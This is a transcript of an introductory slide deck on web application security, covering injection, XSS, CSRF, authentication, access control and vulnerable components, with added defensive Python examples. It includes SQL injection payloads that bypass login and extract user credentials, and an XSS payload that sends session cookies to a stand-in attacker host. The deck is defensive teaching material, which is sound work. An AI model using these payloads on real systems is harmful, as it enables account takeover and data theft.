web application security in a nutshell
DESCRIPTION
>>> View this presentation online at http://webappsec-nutshell.kimminich.de/
TRANSCRIPT
![Page 1: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/1.jpg)
WEB APPLICATION SECURITY IN A NUTSHELL
AN ULTRA-COMPACT INTRO (OR REFRESHER) TO WEB APPLICATION SECURITY
Created by Björn Kimminich / @bkimminich
![Page 2: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/2.jpg)
BJÖRN KIMMINICH
- Application Security Officer at Kuehne + Nagel (AG & Co.) KG
- Author of open-source pentest training webapp juice-shop
- OWASP member and OWASP Zed Attack Proxy contributor
![Page 3: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/3.jpg)
FAMOUS LAST WORDS...
“Nobody would bother to hack us.”
“Our Firewall, IDS and IPS will keep us safe.”
“We will add security to the system later.”
“What's the worst that could actually happen?”
![Page 4: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/4.jpg)
INJECTION
![Page 5: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/5.jpg)
INJECTION MEANS...
...tricking an application into including unintended commands in the data sent to an interpreter.
![Page 6: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/6.jpg)
INTERPRETER MEANS...
...a program that takes a String and interprets it as a command.
![Page 7: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/7.jpg)
INTERPRETERS ARE USED FOR...
- SQL
- HQL
- OS Shell
- LDAP
- XPath
- ...
![Page 8: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/8.jpg)
BYPASSING AUTHENTICATION WITH SQL INJECTION

```java
String query = "SELECT id FROM users "
             + "WHERE name = '" + req.getParameter("username") + "' "
             + "AND password = '" + req.getParameter("password") + "'";
```

The intended use case results in a query like this:

```sql
SELECT id FROM users WHERE name = 'bjoern' AND password = 'secret'
```
![Page 9: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/9.jpg)
ATTACK EXAMPLES ON AUTHENTICATION QUERIES

Disabling password check for a known username:

```sql
SELECT id FROM users WHERE name = 'bjoern'--' AND password = '?'
```

Logging in without even knowing a username:

```sql
SELECT id FROM users WHERE name = '' or 1=1--' AND password = '?'
```
![Page 10: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/10.jpg)
SPYING OUT DATA WITH SQL INJECTION

```java
String query = "SELECT id,author,title,price FROM books "
             + "WHERE title LIKE '%" + req.getParameter("query") + "%'";
```

The intended use case results in a query like this:

```sql
SELECT id,author,title,price FROM books WHERE title LIKE '%tangled web%'
```
![Page 11: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/11.jpg)
ATTACK EXAMPLES ON DATA RETRIEVAL QUERIES

Probing for right number of result set columns:

```sql
SELECT [...] WHERE title LIKE '%' UNION SELECT null FROM users--%'
SELECT [...] WHERE title LIKE '%' UNION SELECT null,null FROM users--%'
SELECT [...] WHERE title LIKE '%' UNION SELECT null,null,null FROM users--%'
```

Using known column names to extract data:

```sql
SELECT [...] WHERE title LIKE '%' UNION SELECT name,password,email FROM users--%'
```
![Page 12: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/12.jpg)
PREVENTING INJECTION
- Avoid Interpreters
- Bind Variables
- Prepared Statements
- Least Privileges for app DB user
- White List Input Validation
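The following is an added example, not code from the slides (which use Java); it replays the two authentication-query probes shown earlier against a constructed in-memory SQLite database. `login_vulnerable` mirrors the slide's string concatenation, `login_safe` uses bind variables, and `is_valid_username` adds the white-list validation layer. The table, users and passwords are constructed for the demo.

```python
import re
import sqlite3


def setup_db():
    """Constructed demo database: two users with plaintext passwords so that
    the generated SQL stays readable (a real system stores salted hashes)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (name, password) VALUES (?, ?)",
                     [("admin", "hunter2"), ("bjoern", "secret")])
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """The slide's string concatenation: the input becomes part of the SQL
    text, so a quote in the username changes the structure of the query."""
    query = ("SELECT id FROM users WHERE name = '" + username + "' "
             "AND password = '" + password + "'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Bind variables / prepared statement: the SQL text is fixed and the
    driver sends the values separately, so quotes and comment markers in the
    input are only ever compared as data, never parsed as SQL."""
    row = conn.execute(
        "SELECT id FROM users WHERE name = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")


def is_valid_username(username):
    """White-list input validation as a second layer: anything that is not a
    plausible username is rejected before it reaches any interpreter."""
    return USERNAME_RE.fullmatch(username) is not None


def demo():
    """Run the two probes from the slide against both implementations."""
    conn = setup_db()
    probes = ["bjoern'--", "' or 1=1--"]
    return {
        "vulnerable": [login_vulnerable(conn, p, "wrong") for p in probes],
        "safe": [login_safe(conn, p, "wrong") for p in probes],
        "validated": [is_valid_username(p) for p in probes],
    }


if __name__ == "__main__":
    print(demo())
```

With the vulnerable version both probes return a user id although the password is wrong; with bind variables the same strings simply fail to match any row, and the white list rejects them before a query is even built. Least privilege for the application's database user (the remaining bullet) is a database-side setting and is not shown here.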
![Page 13: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/13.jpg)
CROSS SITE SCRIPTING (XSS)
![Page 14: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/14.jpg)
MALICIOUS CODE IS SENT...
...to an innocent user's browser through
- a form field or URL (Reflected XSS)
- a previously stored DB record (Persistent XSS)
- a DOM element of a rich JS client (Local XSS)
![Page 15: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/15.jpg)
POSSIBLE DAMAGE FROM XSS
- stolen user session
- stolen sensitive data
- rewriting web page
- redirecting to malicious site
![Page 16: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/16.jpg)
XSS VULNERABILITY EXAMPLE

http://bookwo.rm/titles/search?keywords=raspberry%20pi

The intended use case is to display the keywords above the results:

```jsp
<%
String keywords = request.getParameter("keywords");
List<Book> results = titleSearchService.findByKeywords(keywords.split(" "));
%>
There are <%=results.size()%> results for your search by <em><%=keywords%></em>
<table>
<% for (Book book : results) { /* render result as table rows */ %>
<% } %>
</table>
```
![Page 17: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/17.jpg)
XSS ATTACK EXAMPLES

Probing for XSS Vulnerability

```html
<script>alert(1)</script>
```

Stealing User Session

```html
<script>new Image().src="http://my.evil-si.te/hijack.php?c="+encodeURI(document.cookie);</script>
```

Site Defacement

```html
<script>document.body.background="http://my.evil-si.te/image.jpg";</script>
```
![Page 18: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/18.jpg)
PREVENTING XSS
- Do not unnecessarily include user supplied input into output
- Output encode all user supplied input
- Sanitize HTML where user supplied HTML is unavoidable
- White List Input Validation
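As an added example (not the slides' own JSP, and in Python rather than Java), here is the keyword-search page rendered twice: once as on the vulnerable slide and once with output encoding applied to every user-controlled value, plus a scheme white list for links, since escaping alone does not make a `javascript:` URL safe inside `href`. `BOOKS`, `render_unsafe`, `render_safe` and `safe_href` are constructed for this demo and stand in for the slide's `titleSearchService`.

```python
import html
from urllib.parse import urlsplit

# Constructed search results, standing in for titleSearchService on the slide.
BOOKS = [
    {"title": "Raspberry Pi Cookbook", "url": "http://bookwo.rm/titles/1"},
    {"title": "The Tangled Web", "url": "http://bookwo.rm/titles/2"},
]


def render_unsafe(keywords, results):
    """Mirrors the JSP on the slide: the request parameter and the stored
    titles are written into the page exactly as received."""
    rows = "".join("<tr><td>%s</td></tr>" % book["title"] for book in results)
    return ("There are %d results for your search by <em>%s</em>"
            "<table>%s</table>" % (len(results), keywords, rows))


def safe_href(url):
    """Escaping alone does not help inside href: a 'javascript:' URL is a
    perfectly valid attribute value. White-list the scheme instead."""
    parts = urlsplit(url)
    if parts.scheme.lower() in ("http", "https") and parts.netloc:
        return url
    return "#"


def render_safe(keywords, results):
    """Output-encode every value that came from a user, whether it arrived in
    this request (reflected) or from the database (persistent), for the HTML
    context it is placed in. html.escape() also encodes quotes, which matters
    inside attribute values."""
    rows = "".join(
        '<tr><td><a href="%s">%s</a></td></tr>'
        % (html.escape(safe_href(book["url"])), html.escape(book["title"]))
        for book in results)
    return ("There are %d results for your search by <em>%s</em>"
            "<table>%s</table>" % (len(results), html.escape(keywords), rows))


def contains_active_content(page):
    """Tiny check used by the demo: does the rendered page still carry an
    unencoded script tag or a javascript: link?"""
    lowered = page.lower()
    return "<script" in lowered or 'href="javascript:' in lowered


if __name__ == "__main__":
    probe = "<script>alert(1)</script>"
    print(contains_active_content(render_unsafe(probe, BOOKS)))  # True
    print(contains_active_content(render_safe(probe, BOOKS)))    # False
```

Note that the encoding is chosen per context: `html.escape` is right for text nodes and quoted attribute values, while a URL attribute additionally needs the scheme check, and a value placed inside a `<script>` block would need JavaScript-string encoding instead.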
![Page 19: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/19.jpg)
CROSS SITE REQUEST FORGERY (CSRF)
![Page 20: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/20.jpg)
A VICTIM'S BROWSER...
...is tricked into issuing a command to a vulnerable webapp. This is caused by browsers automatically including user authentication data with each request.
- Session Cookie
- Basic Authentication
- Authorization HTTP Header
- ...
![Page 21: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/21.jpg)
CSRF ATTACK EXAMPLES
![Page 22: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/22.jpg)
PREVENTING CSRF
- Add a secret token to all sensitive requests
- This token must not be automatically submitted
- Require secondary authentication for sensitive functions
- Beware exposing the token in a Referer HTTP header

Make sure your application has no XSS holes that could be exploited to attack others!
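The following is an added example (not from the slides) of the first two bullets: a per-session secret token that is stored server-side and embedded in a POST form, so the browser never attaches it automatically, and a handler that refuses any request without the matching token. The `session` dict, `/transfer` action and form fields are constructed stand-ins for a real framework's session and request objects.

```python
import hmac
import secrets


def issue_csrf_token(session):
    """Create a per-session secret (or reuse the existing one) for embedding
    in forms. It is kept in server-side session state, not in a cookie, so
    the browser never attaches it on its own."""
    token = session.get("csrf_token")
    if token is None:
        token = secrets.token_urlsafe(32)
        session["csrf_token"] = token
    return token


def render_transfer_form(session):
    """The legitimate page carries the token in a hidden field of a POST form.
    Putting it in the form body rather than the URL keeps it out of the
    Referer header of any link the user clicks afterwards."""
    token = issue_csrf_token(session)
    return ('<form method="POST" action="/transfer">'
            '<input type="hidden" name="csrf_token" value="%s">'
            '<input name="to"><input name="amount">'
            '<button>Transfer</button></form>' % token)


def handle_transfer(session, form):
    """Sensitive POST handler: the request is only honoured if it carries the
    session's token. A request triggered from another site arrives with the
    victim's cookies but cannot read or guess this value. The constant-time
    comparison avoids leaking how many leading characters matched."""
    expected = session.get("csrf_token")
    submitted = form.get("csrf_token", "")
    if expected is None or not hmac.compare_digest(expected, submitted):
        return 403, "CSRF token missing or invalid"
    return 200, "transferred %s to %s" % (form["amount"], form["to"])


if __name__ == "__main__":
    session = {}   # constructed stand-in for the server-side session store
    print(render_transfer_form(session))
    cross_site = {"to": "someone", "amount": "1000"}  # what a form on another site could submit
    print(handle_transfer(session, cross_site))       # (403, ...)
    genuine = dict(cross_site, csrf_token=session["csrf_token"])
    print(handle_transfer(session, genuine))          # (200, ...)
```

The last bullet on the slide still applies: script injected through an XSS hole runs same-origin and can read the hidden field, so the token protects against cross-site requests only as long as the application itself is free of XSS.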
![Page 23: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/23.jpg)
BROKEN AUTHENTICATION
![Page 24: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/24.jpg)
TYPICAL AUTHENTICATION FLAWS
- Allowing weak passwords
- Storing SSL certificate insecurely
- Credentials passed via insecure http connection
- Exposing session IDs in URLs, via unencrypted network, logs, ...
![Page 25: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/25.jpg)
SIDE CHANNEL ATTACK VECTORS
- Change Password
- “Remember me”
- Forgot Password
- Secret Questions

Make sure your application does not store credentials in its database unencrypted!
![Page 26: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/26.jpg)
CLASSICAL BROKEN AUTHENTICATION...
...DUE TO STARTING LOGIN PROCESS ON UNENCRYPTED PAGE

http://sick-cure-ba.nk/login.do

```http
POST /login.do HTTP/1.1
Host: sick-cure-ba.nk
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded

username=bjoern&password=secret
```
![Page 27: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/27.jpg)
WEAK HASHES PUT PASSWORDS AT RISK...
...AS DO UNSALTED STRONG HASH ALGORITHMS

| id | username | password |
| --- | --- | --- |
| 1 | admin | d033e22ae348aeb5660fc2140aec35850c4da997 |
| 2 | bjoern | 2bb80d537b1da3e38bd30361aa855686bde0eacd7162fef6a25fe97bf527a25b |
| 3 | localhorst | 0f59bd4122f0c02002ec578e4eec306ed48ff2ad0105a307a6dc98c0e9a54fe464e5f807236edce12134067a0b6690891e82490b2b9fa7b4171db43ee8cb4006 |

Cracking unsalted hashes with a Rainbow Table attack is fast, even though the last two of them might seem sufficiently secure given their 256 and 512 bit length. You can even crack password hashes online, e.g. at CrackStation or via a tweet to @PlzCrack.
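An added example (not part of the slides) that shows in miniature why the digest length in the table above does not matter: a lookup table precomputed once from a word list recovers any unsalted SHA-1, SHA-256 or SHA-512 hash of a word in the list, and then shows the salted, slow alternative (PBKDF2-HMAC-SHA256 from Python's standard library) that makes such a table useless. The word list and passwords are constructed; the hashes on the slide themselves are not decoded here.

```python
import hashlib
import hmac
import os

# Constructed word list: a dictionary / rainbow-table attack in miniature.
WORDLIST = ["123456", "password", "admin", "secret", "letmein"]
ALGORITHMS = ("sha1", "sha256", "sha512")


def unsalted_hash(password, algorithm):
    """What the slide's table stores: a plain digest of the password."""
    return hashlib.new(algorithm, password.encode()).hexdigest()


def precompute_table(wordlist, algorithms=ALGORITHMS):
    """Attacker-side lookup table: every (word, algorithm) pair hashed once.
    Without a salt the same word always gives the same digest, so the table
    is built once and reused against every leaked database, and the digest
    length (160, 256 or 512 bit) makes no difference."""
    return {unsalted_hash(w, a): w for w in wordlist for a in algorithms}


def lookup(stored_hash, table):
    """Recover the password for a stored unsalted hash, if it is in the table."""
    return table.get(stored_hash)


def hash_password(password, salt=None, iterations=600_000):
    """Defender side: a random per-user salt plus a deliberately slow key
    derivation (PBKDF2-HMAC-SHA256, standard library). The encoded form
    'pbkdf2_sha256$iterations$salt$digest' keeps the parameters with the hash."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), digest.hex())


def verify_password(password, stored):
    """Re-derive with the stored salt and iteration count; constant-time compare."""
    _, iterations, salt_hex, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    table = precompute_table(WORDLIST)
    for algorithm in ALGORITHMS:
        print(algorithm, lookup(unsalted_hash("secret", algorithm), table))  # secret
    stored = hash_password("secret")
    print(stored)
    print(verify_password("secret", stored), verify_password("wrong", stored))  # True False
```

Two things make the second scheme resistant: the salt means every user's hash has to be attacked individually (no shared table), and the iteration count makes each guess cost hundreds of thousands of hash operations instead of one. A dedicated password hash such as bcrypt, scrypt or Argon2 is the usual choice where a library for it is available.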
![Page 28: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/28.jpg)
BROKEN ACCESS CONTROL
![Page 29: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/29.jpg)
COMMON AUTHORIZATION MISTAKES
- Hiding object references instead of restricting access
- Displaying only authorized links and menu choices
- Trusting client-side access control mechanisms
- Lack of server-side verification of user privileges
![Page 30: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/30.jpg)
REQUEST TAMPERING FOR PRIVILEGE ESCALATION...
...AND FINDING ALL KINDS OF ACCESS CONTROL ISSUES

http://logistics-worldwi.de/showShipment?id=40643108
http://my-universi.ty/api/students/6503/exams/view
http://document-warehou.se/landingpage?content=index.html
![Page 31: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/31.jpg)
SECURING AUTHORIZATION
- Never rely on “Security by obscurity”
- Replace direct object references with temporary mappings
- Restrict data and functionality access to authorized users
- Enforce user or role based permissions
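As an added example (not the slides' code), the `showShipment?id=...` endpoint from the previous slide is implemented with a server-side permission check on every request, a role-based exception, and a per-session reference map that hands the client random handles instead of raw ids. `SHIPMENTS`, the user dicts, the `support` role and the `ReferenceMap` class are constructed for this demo.

```python
import secrets

# Constructed records: shipments belonging to different customers.
SHIPMENTS = {
    40643108: {"owner": "acme", "status": "in transit"},
    40643109: {"owner": "globex", "status": "delivered"},
}


class Forbidden(Exception):
    pass


def may_view_shipment(current_user, shipment_id):
    """Server-side permission check. The identity comes from the
    authenticated session, never from the request, and the decision is
    based on the record itself (owner or role), not on which links or menu
    entries the UI happened to render."""
    shipment = SHIPMENTS.get(shipment_id)
    if shipment is None:
        return False
    if "support" in current_user.get("roles", ()):
        return True                                    # role-based permission
    return shipment["owner"] == current_user["name"]   # user-based permission


def show_shipment(current_user, shipment_id):
    """Handler for showShipment?id=...: refuse unless the check above passes.
    'Does not exist' and 'not yours' give the same response so that valid
    ids cannot be confirmed by probing."""
    if not may_view_shipment(current_user, shipment_id):
        raise Forbidden("no such shipment")
    return SHIPMENTS[shipment_id]


class ReferenceMap:
    """Temporary per-session mapping in place of direct object references:
    the client only ever sees random handles issued for objects it was
    shown, and the server translates them back. Ownership is still checked
    on resolution; the map is a supplement, not a substitute."""

    def __init__(self):
        self._to_id = {}

    def handle_for(self, object_id):
        handle = secrets.token_urlsafe(12)
        self._to_id[handle] = object_id
        return handle

    def resolve(self, handle):
        return self._to_id.get(handle)


def show_shipment_by_handle(current_user, refmap, handle):
    shipment_id = refmap.resolve(handle)
    if shipment_id is None:
        raise Forbidden("unknown reference")
    return show_shipment(current_user, shipment_id)


if __name__ == "__main__":
    acme = {"name": "acme", "roles": ()}
    refmap = ReferenceMap()
    handle = refmap.handle_for(40643108)
    print(show_shipment_by_handle(acme, refmap, handle))
    print(may_view_shipment(acme, 40643109))   # False: belongs to another customer
```

The indirect reference alone would be "security by obscurity" if the server stopped checking ownership after resolving the handle, which is why `show_shipment_by_handle` still goes through `may_view_shipment`.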
![Page 32: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/32.jpg)
BROKEN ENVIRONMENT
![Page 33: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/33.jpg)
POSSIBLE ENVIRONMENTAL VULNERABILITIES
- Software Libraries
- Application Server
- Web Server
- Operating System
- ...
![Page 34: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/34.jpg)
KNOWN VULNERABILITY EXAMPLES

| Component | Vulnerability | Affected |
| --- | --- | --- |
| OpenSSL | Obtain sensitive information from process memory via crafted packets that trigger a buffer over-read (Heartbleed) | 1.0.1 - 1.0.1f, 1.0.2-beta, 1.0.2-beta1 |
| Unix Bash | Execution of arbitrary commands on vulnerable Bash, potentially compromising the entire system (Shellshock) | CGI, OpenSSH, DHCP, QMail, ... |
| Struts | Remote manipulation of the ClassLoader via the class parameter, which is passed to the getClass() method | before 2.3.16.1 |
| Struts | Wildcard cookiesName does not properly restrict access to the getClass() method, which allows ClassLoader manipulation | before 2.3.16.2 |
![Page 35: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/35.jpg)
PROTECTION FROM ENVIRONMENTAL VULNERABILITIES
- Monitor security of used components
- Keep up with patches for used components
- Remove unnecessary stuff on all levels
- Restrict use of unapproved components

Java and .NET project dependencies can be monitored by OWASP Dependency Check, which relies on the NIST National Vulnerability Database. For Javascript and Node.js modules there is Retire.js, which is updated manually via its GitHub project. Both tools integrate well with typical software build processes.
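The following is an added example, not code from the slides or from either of the tools named above; it shows the core of what such a dependency check does: compare each component's version against advisory ranges. The `ADVISORIES` entries are constructed from the table on the previous slide (names and ranges as given there, no CVE ids), the dependency manifest is constructed, and the version parser only handles dotted numbers with an optional letter suffix such as `1.0.1f` (pre-release forms like `1.0.2-beta` are rejected with an error).

```python
import re

# Constructed advisory entries modelled on the slide's table. A range is
# either [introduced, fixed) or [introduced, last_affected]; an absent
# 'introduced' means "all earlier releases".
ADVISORIES = [
    {"component": "openssl", "name": "Heartbleed",
     "introduced": "1.0.1", "last_affected": "1.0.1f"},
    {"component": "struts", "name": "ClassLoader manipulation via class parameter",
     "fixed": "2.3.16.1"},
    {"component": "struts", "name": "ClassLoader manipulation via wildcard cookiesName",
     "fixed": "2.3.16.2"},
]


def parse_version(version):
    """Turn '1.0.1f' into ((1,''), (0,''), (1,'f')) so that tuples compare the
    way release numbering intends: 1.0.1 < 1.0.1f < 1.0.1g and 2.3.16 < 2.3.16.1."""
    parts = []
    for piece in version.split("."):
        match = re.fullmatch(r"(\d+)([A-Za-z]*)", piece)
        if match is None:
            raise ValueError("unsupported version format: %r" % version)
        parts.append((int(match.group(1)), match.group(2)))
    return tuple(parts)


def is_affected(advisory, version):
    """True if 'version' falls inside the advisory's affected range."""
    v = parse_version(version)
    if "introduced" in advisory and v < parse_version(advisory["introduced"]):
        return False
    if "fixed" in advisory:
        return v < parse_version(advisory["fixed"])
    return v <= parse_version(advisory["last_affected"])


def audit(dependencies, advisories=ADVISORIES):
    """Match a project's (component -> version) map against the advisories.
    Returns (component, version, advisory name) for every hit."""
    findings = []
    for component, version in dependencies.items():
        for advisory in advisories:
            if advisory["component"] == component and is_affected(advisory, version):
                findings.append((component, version, advisory["name"]))
    return findings


if __name__ == "__main__":
    # Constructed dependency manifest of a hypothetical build.
    print(audit({"openssl": "1.0.1f", "struts": "2.3.16.1", "bash": "4.3"}))
```

Running this in a build and failing the build on a non-empty result is the "integrate with the build process" step the slide refers to; the real tools differ mainly in that they pull the advisory data from the NVD or a curated repository instead of a hand-written list.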
![Page 36: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/36.jpg)
Q&A
![Page 37: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/37.jpg)
CREDITS
Presentation created with reveal.js (The HTML Presentation Framework)
Based on free material provided by OWASP (The Open Web Application Security Project)
Background image based on Digital Shodan by sephiroth-kmfdm
![Page 38: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/38.jpg)
THE END
BY BJÖRN KIMMINICH / KIMMINICH.DE
These slides are publicly available on GitHub and Slideshare.